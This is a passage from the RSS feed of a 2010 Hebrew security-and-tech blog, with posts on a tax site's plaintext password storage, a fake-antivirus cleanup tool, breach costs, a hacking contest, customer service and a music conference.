		<description><![CDATA[&#8235;בעלי עסקים מכירים את העניין של ללכת לשלם מע&#34;מ ב-15 לחודש בכל חודש או  חודשיים.
כשפתחתי את תיק העוסק שלי גיליתי שדברים השתנו וניתן לשלם מע&#34;מ דרך האינטרנט  באתר של רשות המיסים: https://www.shaam.gov.il/Shaam_internet.
זה שיפור עצום שלא צריך ללכת לבזבז זמן בדואר והם גם נותנים לכם את האפשרות לשלם  ב-19 לחודש במקום ב-15. זה [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fmaam-site-password&crtId=148&dt=1283503588">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>בעלי עסקים מכירים את העניין של ללכת לשלם מע&quot;מ ב-15 לחודש בכל חודש או  חודשיים.</p>
<p>כשפתחתי את תיק העוסק שלי גיליתי שדברים השתנו וניתן לשלם מע&quot;מ דרך האינטרנט  באתר של רשות המיסים: <a href="https://www.shaam.gov.il/Shaam_internet/" target="_blank">https://www.shaam.gov.il/Shaam_internet</a>.</p>
<p>זה שיפור עצום שלא צריך ללכת לבזבז זמן בדואר והם גם נותנים לכם את האפשרות לשלם  ב-19 לחודש במקום ב-15. זה לא רע.</p>
<p>הרישום לשירות קליל אבל בסיום התהליך נדלקה לי נורת אזהרה כלשהי..</p>
<p>הדף המסכם הציג הודעה שהקוד שלי הוא XXX והסיסמה האישית שלי היא YYY. האם יכול  להיות שהם שומרים את הסיסמה גלויה ולא מוצפנת ב-DB?</p>
<p>איך נברר את העניין? מעניין.</p>
<p>שיחת טלפון אל התמיכה. שכחתי סיסמה.</p>
<p>החבר'ה ביקשו ממני את מזהה המשתמש והסיסמה. <strong>הם ביקשו ממני את  הסיסמה!</strong></p>
<p>כשאמרתי להם את הסיסמה (היא הוחלפה מראש כך שלא ראיתי בכך בעיית אבטחה) הם אמרו  לי שהסיסמה הוחלפה ונתנו לי את הסיסמה החדשה!</p>
<p>אכן &#8211; הסיסמה שמורה ללא הצפנה ב-DB. התומכים יכולים לראות את הסיסמאות שלנו.</p>
<p>חשוב להגיד:</p>
<p>1. יש הליך &quot;קצר&quot; לאחזור סיסמה. אתם נדרשים לענות על הפרטים הבאים:</p>
<p><a href="http://guym.co.il/wp-content/uploads/2010/05/2.png"><img class="aligncenter size-full wp-image-1486" title="שחזור סיסמה באתר מעמ" src="http://guym.co.il/wp-content/uploads/2010/05/2.png" alt="שחזור סיסמה באתר מעמ" width="812" height="657" /></a>חשוב להגיד שמספיק שטעיתם בפרט יחיד ולא תוכלו לשחזר סיסמה דרך האתר. אבטחה –  10. שימושיות – 0.</p>
<p>עוד נושא שרציתי להעלות כאן הוא הנושא הזה:</p>
<p><a href="http://guym.co.il/wp-content/uploads/2010/05/3.png"><img class="aligncenter size-full wp-image-1491" title="כניסה לאתר מעמ" src="http://guym.co.il/wp-content/uploads/2010/05/3.png" alt="כניסה לאתר מעמ" width="487" height="344" /></a></p>
<p>הרבה אתרים רשמיים דואגים לייצר מין הזדהות כפולה שכזו.</p>
<p>מספר תיק עוסק זה קל לגלות ומופיע בכל חשבונית כך שזה אינו יכול להיחשב כפרט  מוסתר.</p>
<p>קוד משתמש וסיסמה הם פקטורי ההזדהות.</p>
<p>באותה שיחה שיזמתי שאלתי אם משנה אם התווים גדולים או קטנים בשם ובסיסמה. התשובה  היתה שזה לא משנה.</p>
<p>מעניין.</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fmaam-site-password&crtId=148&dt=1283503588"><p align="left"><a class="tt" href="http://twitter.com/home/?status=%D7%90%D7%91%D7%98%D7%97%D7%94+%D7%A9%D7%9C+%D7%90%D7%AA%D7%A8+%D7%A8%D7%90%D7%A9%D7%95%D7%AA+%D7%94%D7%9E%D7%99%D7%A1%D7%99%D7%9D+http://bit.ly/dqDV4l" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/maam-site-password/feed/</wfw:commentRss>
		<slash:comments>16</slash:comments>
		</item>
		<item>
		<title>&#8235;ERACleaner &#8211; כלי לניקוי אנטיוירוסים מתחזים&#8236;</title>		<link>http://guym.co.il/eracleaner/?nucrss=1</link>
		<comments>http://guym.co.il/eracleaner/#comments</comments>
		<pubDate>Mon, 17 May 2010 11:23:38 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1474</guid>
		<description><![CDATA[&#8235;כפיר טויטו מחברת קומסקיור שלח לי הודעה על כך ש-ESET הוציאה כלי מעניין שאמור לנקות את כל אותם אנטיוירוסים מתחזים.
ציטוט:
&#34; כלי זה יצא בעקבות ריבוי מקרה ההונאה של תוכנות אנטי וירוס מזויפות המתחזות לתוכנות לגיטימיות ותוקפות גולשים תמימים, בשנים האחרונות, ובמיוחד בשנת 2009, הייתה עליה חדה בנוזקות המתחזות לתוכנות אנטי וירוס לגיטימיות.
תופעה זו, אשר זכתה [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Feracleaner&crtId=148&dt=1283503588">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p><strong>כפיר טויטו</strong> מחברת <a href="http://www.eset.co.il" target="_blank">קומסקיור</a> שלח לי הודעה על כך ש-ESET הוציאה כלי מעניין שאמור לנקות את כל אותם אנטיוירוסים מתחזים.</p>
<p>ציטוט:</p>
<p>&quot; כלי זה יצא בעקבות ריבוי מקרה ההונאה של תוכנות אנטי וירוס מזויפות המתחזות לתוכנות לגיטימיות ותוקפות גולשים תמימים, בשנים האחרונות, ובמיוחד בשנת 2009, הייתה עליה חדה בנוזקות המתחזות לתוכנות אנטי וירוס לגיטימיות.</p>
<p>תופעה זו, אשר זכתה לכינוי ScareWare בפי מומחי אבטחת מידע בעולם, ממשיכה לצמוח ולפי מחקר שנערך ופורסם לאחרונה על ידי גוגל, 15% מכלל הנוזקות ברשת הן תוכנות אנטי וירוס מזויפות – בשנה האחרונה הייתה עליה של 400% בנוזקות אלו.&quot;</p>
<p><a href="http://download.eset.com/special/ERACleaner.exe" target="_self">הורדת ERACleaner.</a></p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Feracleaner&crtId=148&dt=1283503588"><p align="left"><a class="tt" href="http://twitter.com/home/?status=ERACleaner+%E2%80%93+%D7%9B%D7%9C%D7%99+%D7%9C%D7%A0%D7%99%D7%A7%D7%95%D7%99+%D7%90%D7%A0%D7%98%D7%99%D7%95%D7%99%D7%A8%D7%95%D7%A1%D7%99%D7%9D+%D7%9E%D7%AA%D7%97%D7%96%D7%99%D7%9D+http://bit.ly/b6taIe" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/eracleaner/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>&#8235;אז מה כבר יקרה אם יפרצו לנו?&#8236;</title>		<link>http://guym.co.il/the-price-of-hack/?nucrss=1</link>
		<comments>http://guym.co.il/the-price-of-hack/#comments</comments>
		<pubDate>Sat, 15 May 2010 08:54:23 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[CISO]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[אבטחת מידע]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1466</guid>
		<description><![CDATA[&#8235;הוצאות על אבטחת מידע בארגונים רבים נתפסת כצעד הכרחי בגלל תקנים שהם חייבים לעמוד בהם.
כ-CISO קל לנו להראות שאנו חייבים לבצע הוצאות מסויימות כיוון שאם לא יבוצעו אז לא נעמוד בתקנים שונים שלעיתים הארגון חייב לעמוד בהם. עם זאת, בהרבה מקרים קשה ל-CISO באירגון לייצר מצב בו רואים ROI (החזר על הוצאה) בכסף שמושקע באבטחת [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fthe-price-of-hack&crtId=148&dt=1283503588">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>הוצאות על אבטחת מידע בארגונים רבים נתפסת כצעד הכרחי בגלל תקנים שהם חייבים לעמוד בהם.</p>
<p>כ-CISO קל לנו להראות שאנו חייבים לבצע הוצאות מסויימות כיוון שאם לא יבוצעו אז לא נעמוד בתקנים שונים שלעיתים הארגון חייב לעמוד בהם. עם זאת, בהרבה מקרים קשה ל-CISO באירגון לייצר מצב בו רואים ROI (החזר על הוצאה) בכסף שמושקע באבטחת מידע.</p>
<p>בינואר 2009 התפרסם שחברת <a href="http://www.heartlandpaymentsystems.com/" target="_blank">Heartland Payment Systems</a> סבלה מהתקפה שגרמה לה לאיבוד מידע.החברה שעוסקת בסליקת כרטיסי אשראי הצהירה שלא מדובר במידע מהותי כגון Social Security Numbers אך כן נגנבו 130 מיליון מספרי כרטיסי אשראי וכן שמות המחזיקים אותם. (<a href="http://www.msnbc.msn.com/id/28758856" target="_blank">http://www.msnbc.msn.com/id/28758856</a>/).</p>
<p>הפרצה הזו עלתה לחברה מעל 140 מליון דולר עד עכשיו:</p>
<p>60 מליון דולר הסדר עם חברת ויזה, 3.5 מילין דולר לאמריקאן אקספרס, 26 מיליון בתביעות משפטיות כאלה ואחרות.</p>
<p>עוד 42 מיליון דולר החברה שמה בצד לצורך תשלומי תביעות עתידיות.</p>
<p>עלות נוספת משמעותית היא הפסד הכנסות מעסקים &#8211; חברות פשוט הפסיקו להשתמש בשירותי החברה בשל הפריצה.</p>
<p>כשרואים את הסכומים מבינים די בקלות שניתן להצדיק הוצאות על אבטחת מידע כיוון שיש להם ROI ברור: כל עוד לא פרצו לא הפסדנו כסף אך גם כשכבר פורצים חס וחלילה &#8211; ככל שנאבד פחות מידע, ככל שמערכות שונות יגבילו את התוקף ניפגע פחות כתוצאה מתשלום פיצויים.עכשיו נשאר רק להציג את זה נכון למקבלי ההחלטות <img src='http://guym.co.il/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fthe-price-of-hack&crtId=148&dt=1283503588"><p align="left"><a class="tt" href="http://twitter.com/home/?status=%D7%90%D7%96+%D7%9E%D7%94+%D7%9B%D7%91%D7%A8+%D7%99%D7%A7%D7%A8%D7%94+%D7%90%D7%9D+%D7%99%D7%A4%D7%A8%D7%A6%D7%95+%D7%9C%D7%A0%D7%95%3F+http://bit.ly/ciof48" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/the-price-of-hack/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>&#8235;צריכים עבודה?&#8236;</title>		<link>http://guym.co.il/%d7%a6%d7%a8%d7%99%d7%9b%d7%99%d7%9d-%d7%a2%d7%91%d7%95%d7%93%d7%94/?nucrss=1</link>
		<comments>http://guym.co.il/%d7%a6%d7%a8%d7%99%d7%9b%d7%99%d7%9d-%d7%a2%d7%91%d7%95%d7%93%d7%94/#comments</comments>
		<pubDate>Fri, 07 May 2010 03:36:16 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1455</guid>
		<description><![CDATA[&#8235;חבר שלי מחפש עובדים.
פרטים פה:

.prezi-player { width: 550px; } .prezi-player-links { text-align: center; }


CrowdSpot is hiring amazing tech people on Prezi


<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F%25d7%25a6%25d7%25a8%25d7%2599%25d7%259b%25d7%2599%25d7%259d-%25d7%25a2%25d7%2591%25d7%2595%25d7%2593%25d7%2594&crtId=148&dt=1283503588">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>חבר שלי מחפש עובדים.<br />
פרטים פה:</p>
<div class="prezi-player">
<style type="text/css" media="screen">.prezi-player { width: 550px; } .prezi-player-links { text-align: center; }</style>
<p><object id="prezi_78pwoyg8b4ix" name="prezi_78pwoyg8b4ix" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="550" height="400"><param name="movie" value="http://prezi.com/bin/preziloader.swf"/><param name="allowfullscreen" value="true"/><param name="allowscriptaccess" value="always"/><param name="bgcolor" value="#ffffff"/><param name="flashvars" value="prezi_id=78pwoyg8b4ix&amp;lock_to_path=1&amp;color=ffffff&amp;autoplay=no"/><embed id="preziEmbed_78pwoyg8b4ix" name="preziEmbed_78pwoyg8b4ix" src="http://prezi.com/bin/preziloader.swf" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="550" height="400" bgcolor="#ffffff" flashvars="prezi_id=78pwoyg8b4ix&amp;lock_to_path=1&amp;color=ffffff&amp;autoplay=no"></embed></object>
<div class="prezi-player-links">
<p><a title="Click on the play button to look for further information" href="http://prezi.com/78pwoyg8b4ix/crowdspot-is-hiring-amazing-tech-people/">CrowdSpot is hiring amazing tech people</a> on <a href="http://prezi.com">Prezi</a></p>
</div>
</div>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F%25d7%25a6%25d7%25a8%25d7%2599%25d7%259b%25d7%2599%25d7%259d-%25d7%25a2%25d7%2591%25d7%2595%25d7%2593%25d7%2594&crtId=148&dt=1283503588"><p align="left"><a class="tt" href="http://twitter.com/home/?status=%D7%A6%D7%A8%D7%99%D7%9B%D7%99%D7%9D+%D7%A2%D7%91%D7%95%D7%93%D7%94%3F+http://bit.ly/cw01Se" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/%d7%a6%d7%a8%d7%99%d7%9b%d7%99%d7%9d-%d7%a2%d7%91%d7%95%d7%93%d7%94/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>&#8235;Chrome החדש מהיר.&#8236;</title>		<link>http://guym.co.il/chrome-%d7%94%d7%97%d7%93%d7%a9-%d7%9e%d7%94%d7%99%d7%a8/?nucrss=1</link>
		<comments>http://guym.co.il/chrome-%d7%94%d7%97%d7%93%d7%a9-%d7%9e%d7%94%d7%99%d7%a8/#comments</comments>
		<pubDate>Thu, 06 May 2010 10:33:37 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1406</guid>
		<description><![CDATA[&#8235;יובל דרור צייץ על זה ב-TWITTER והפרסומת הזאת מדגישה את זה.

אז אם פרטיות לא מעניינת אתכם (וזה בסדר מבחינתכם גם כשאתם יודעים מה גוגל יודעת עליכם), כדאי להוריד..
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fchrome-%25d7%2594%25d7%2597%25d7%2593%25d7%25a9-%25d7%259e%25d7%2594%25d7%2599%25d7%25a8&crtId=148&dt=1283503588">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>יובל דרור צייץ על זה ב-TWITTER והפרסומת הזאת מדגישה את זה.<br />
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="640" height="385" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowScriptAccess" value="always" /><param name="src" value="http://www.youtube.com/v/nCgQDjiotG0&amp;color1=0xb1b1b1&amp;color2=0xd0d0d0&amp;hl=en_US&amp;feature=player_embedded&amp;fs=1" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="640" height="385" src="http://www.youtube.com/v/nCgQDjiotG0&amp;color1=0xb1b1b1&amp;color2=0xd0d0d0&amp;hl=en_US&amp;feature=player_embedded&amp;fs=1" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<p>אז אם פרטיות לא מעניינת אתכם (וזה בסדר מבחינתכם גם כשאתם יודעים <a href="http://guym.co.il/what-google-knows-about-you/" target="_blank">מה גוגל יודעת עליכם</a>), כדאי להוריד..</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fchrome-%25d7%2594%25d7%2597%25d7%2593%25d7%25a9-%25d7%259e%25d7%2594%25d7%2599%25d7%25a8&crtId=148&dt=1283503588"><p align="left"><a class="tt" href="http://twitter.com/home/?status=Chrome+%D7%94%D7%97%D7%93%D7%A9+%D7%9E%D7%94%D7%99%D7%A8.+http://bit.ly/cjrpXY" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/chrome-%d7%94%d7%97%d7%93%d7%a9-%d7%9e%d7%94%d7%99%d7%a8/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>&#8235;How Strong is your Fu?&#8236;</title>		<link>http://guym.co.il/how-strong-is-your-foo/?nucrss=1</link>
		<comments>http://guym.co.il/how-strong-is-your-foo/#comments</comments>
		<pubDate>Wed, 05 May 2010 04:58:12 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1402</guid>
		<description><![CDATA[&#8235;למי שעוד לא שמע &#8211; יש תחרות האקינג מגניבה לחלוטין שמארגן צוות Offensive Security.
התחרות נקראת How strong is your Fu? והיא נראית מגניבה לגמרי.
פרטים נוספים פה:
http://www.information-security-training.com/events/offensive-security-hacking-tournament-updates/
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fhow-strong-is-your-foo&crtId=148&dt=1283503588">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>למי שעוד לא שמע &#8211; יש תחרות האקינג מגניבה לחלוטין שמארגן צוות Offensive Security.</p>
<p>התחרות נקראת <a href="http://www.information-security-training.com/news/offensive-security-hacking-tournament/" target="_blank">How strong is your Fu?</a> והיא נראית מגניבה לגמרי.</p>
<p>פרטים נוספים פה:</p>
<p><a href="http://www.information-security-training.com/events/offensive-security-hacking-tournament-updates/" target="_blank">http://www.information-security-training.com/events/offensive-security-hacking-tournament-updates/</a></p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fhow-strong-is-your-foo&crtId=148&dt=1283503588"><p align="left"><a class="tt" href="http://twitter.com/home/?status=How+Strong+is+your+Fu%3F+http://bit.ly/aRy6WM" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/how-strong-is-your-foo/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>&#8235;TO HOT OR NOT (או חוויית קבלת מענה בצ&#039;אט)&#8236;</title>		<link>http://guym.co.il/to-hot-or-not-%d7%90%d7%95-%d7%97%d7%95%d7%95%d7%99%d7%99%d7%aa-%d7%a7%d7%91%d7%9c%d7%aa-%d7%9e%d7%a2%d7%a0%d7%94-%d7%91%d7%a6%d7%90%d7%98/?nucrss=1</link>
		<comments>http://guym.co.il/to-hot-or-not-%d7%90%d7%95-%d7%97%d7%95%d7%95%d7%99%d7%99%d7%aa-%d7%a7%d7%91%d7%9c%d7%aa-%d7%9e%d7%a2%d7%a0%d7%94-%d7%91%d7%a6%d7%90%d7%98/#comments</comments>
		<pubDate>Mon, 03 May 2010 11:59:20 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1399</guid>
		<description><![CDATA[&#8235;ניסיתי היום לברר מחיר לחבילה של אינטרנט, טלפון וטלוויזיה ב-HOT.
נכנסתי לאתר שלהם והופתעתי לראות שיש אפשרות לקבלת מענה בצ'אט. חשבתי לעצמי &#34;הממממ&#8230; אפשר לכתוב על זה אח&#34;כ&#34;.
תיארתי לי מראש שזה הולך להיות בעייתי אבל מה לא אעשה בשביל קוראי האהובים?
אז שינסתי מותני, אזרתי אומץ ולחצתי על הכפתור.
קודם כל &#8211; אני עם FIREFOX והאתר עבד. הפתעה [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fto-hot-or-not-%25d7%2590%25d7%2595-%25d7%2597%25d7%2595%25d7%2595%25d7%2599%25d7%2599%25d7%25aa-%25d7%25a7%25d7%2591%25d7%259c%25d7%25aa-%25d7%259e%25d7%25a2%25d7%25a0%25d7%2594-%25d7%2591%25d7%25a6%25d7%2590%25d7%2598&crtId=148&dt=1283503588">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>ניסיתי היום לברר מחיר לחבילה של אינטרנט, טלפון וטלוויזיה ב-HOT.</p>
<p>נכנסתי לאתר שלהם והופתעתי לראות שיש אפשרות לקבלת מענה בצ'אט. חשבתי לעצמי &quot;הממממ&#8230; אפשר לכתוב על זה אח&quot;כ&quot;.</p>
<p>תיארתי לי מראש שזה הולך להיות בעייתי אבל מה לא אעשה בשביל קוראי האהובים?</p>
<p>אז שינסתי מותני, אזרתי אומץ ולחצתי על הכפתור.</p>
<p>קודם כל &#8211; אני עם FIREFOX והאתר עבד. הפתעה נעימה <img src='http://guym.co.il/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<p>פתאום הפתעה פחות נעימה: כל הדפדפן הוקטן למימדים מזעריים ונפתח חלון צ'אט זוועתי.</p>
<p>ענתה לי אשת מכירות והתחלנו להתכתב.</p>
<p>אני כתבתי משפט בשנייה או שתיים, אולי שלוש. אז המתנתי 50-60 שניות ואז הופיעה כיתוב שמראה שאשת המכירות עונה. כן, לקח לה כמעט דקה לענות.</p>
<p>אם תהיתם: זה לא היה חד פעמי. בכל פעם זמן ההמתנה לתגובה היא בין 40 שניות במקרה הטוב ל-60 שניות במקרה הפחות נחמד.</p>
<p>כל שאלה הייתי צריך לנסח כמה פעמים. רוצים דוגמאות? טוב..</p>
<p>גיא: אני רוצה לקבל מחיר ללא התחייבות.</p>
<p>שרי: חבילה של כל הערוצים ואינטרנט עד 12M ו1000 דקות לטלפון תעלה לך 260 ש&quot;ח בהתחייבות ל-36 חודשים. התקנה 100 ש&quot;ח.</p>
<p>גיא: אני לא רוצה התחייבות. אפילו לא לחודש.</p>
<p>שרי: בלי התחייבות תשלם מחיר מחירון.</p>
<p>גיא: מה מחיר המחירון?</p>
<p>שרי: חבילת בסיס + 6 חבילות 260 ש&quot;ח. לא כולל ממירים.</p>
<p>גיא: כמה עולה שכירות לממירים?</p>
<p>לא היתה תגובה מעל 90 שניות ואז התעצבנתי וניתקתי.</p>
<p>בקיצור: אי אפשר לקבל שירות סביר באמצעות צ'אט. אי אפשר לקבל תגובות סבירות כי הנציגה לא קוראת מה אתם רוצים. היא ממלאת אתכם בהצעות מוכנות ואם צריך משהו שונה&#8230; זו בעיה.</p>
<p>מצד שני, יכול להיות שגם בשיחת טלפון זה ככה. אני לא בטוח שאתקשר לבדוק.</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fto-hot-or-not-%25d7%2590%25d7%2595-%25d7%2597%25d7%2595%25d7%2595%25d7%2599%25d7%2599%25d7%25aa-%25d7%25a7%25d7%2591%25d7%259c%25d7%25aa-%25d7%259e%25d7%25a2%25d7%25a0%25d7%2594-%25d7%2591%25d7%25a6%25d7%2590%25d7%2598&crtId=148&dt=1283503588"><p align="left"><a class="tt" href="http://twitter.com/home/?status=TO+HOT+OR+NOT+%28%D7%90%D7%95+%D7%97%D7%95%D7%95%D7%99%D7%99%D7%AA+%D7%A7%D7%91%D7%9C%D7%AA+%D7%9E%D7%A2%D7%A0%D7%94+%D7%91%D7%A6%27%D7%90%D7%98%29+http://bit.ly/cLrH04" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/to-hot-or-not-%d7%90%d7%95-%d7%97%d7%95%d7%95%d7%99%d7%99%d7%aa-%d7%a7%d7%91%d7%9c%d7%aa-%d7%9e%d7%a2%d7%a0%d7%94-%d7%91%d7%a6%d7%90%d7%98/feed/</wfw:commentRss>
		<slash:comments>15</slash:comments>
		</item>
		<item>
		<title>&#8235;בכנס דהמרקר&#8236;</title>		<link>http://guym.co.il/%d7%91%d7%9b%d7%a0%d7%a1-%d7%93%d7%94%d7%9e%d7%a8%d7%a7%d7%a8/?nucrss=1</link>
		<comments>http://guym.co.il/%d7%91%d7%9b%d7%a0%d7%a1-%d7%93%d7%94%d7%9e%d7%a8%d7%a7%d7%a8/#comments</comments>
		<pubDate>Sun, 02 May 2010 07:18:14 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[מוסיקה ברשת]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1391</guid>
		<description><![CDATA[&#8235;אני אשתדל לעדכן במהלך היום, בינתיים מעניין אותי &#34;עתיד המוסיקה&#34; ברשת.
בטח אעבור לאולמות אחרים במהלך היום.
רונית ארבל (המנהלת העסקית של אייל גולן) תיארה את העבודה שמתבצעת כדי   לקדם את אייל גולן בסלולר והיה מאוד מעניין לשמוע שזאת עבודה ברמה   יומיומית.
טל ברמן בא ושם את הדברים על השולחן &#8211; יש פה השתלטות [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F%25d7%2591%25d7%259b%25d7%25a0%25d7%25a1-%25d7%2593%25d7%2594%25d7%259e%25d7%25a8%25d7%25a7%25d7%25a8&crtId=148&dt=1283503588">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>אני אשתדל לעדכן במהלך היום, בינתיים מעניין אותי &quot;עתיד המוסיקה&quot; ברשת.</p>
<p>בטח אעבור לאולמות אחרים במהלך היום.</p>
<p>רונית ארבל (המנהלת העסקית של אייל גולן) תיארה את העבודה שמתבצעת כדי   לקדם את אייל גולן בסלולר והיה מאוד מעניין לשמוע שזאת עבודה ברמה   יומיומית.</p>
<p>טל ברמן בא ושם את הדברים על השולחן &#8211; יש פה השתלטות של התאגידים   הגדולים והוא דיבר בצורה יפה ומעניינת. הטענות רציניות.</p>
<p>יוני בלוך מגיב &#8211; שיר טוב זה לא מספיק. צריך משהו מעבר לזה כדי באמת   להתפרסם. קליפ איכותי, רעיון ייחודי ולא רק מוסיקה טובה.</p>
<p>ארבל מוסיפה שגם אמן כמו ריטה זה לא היה בהתחלה קל למכור לסלולר וזאת   היתה עבודה קשה לשווק אותה.</p>
<p>יאיר ניצני &#8211; אינטרנט זה כמו רשת החשמל. אף אחד לא הבטיח שהאינטרנט תהיה   המושיע של האמנים הגרועים. יאיר אומר שהרדיו מחליט בשביל אנשים מה שומעים   וארבל אומרת שרדיו זה מקום שלישי או רביעי. יאיר אומר שאם השיר גרוע הוא   בכל מקרה לא יצליח.</p>
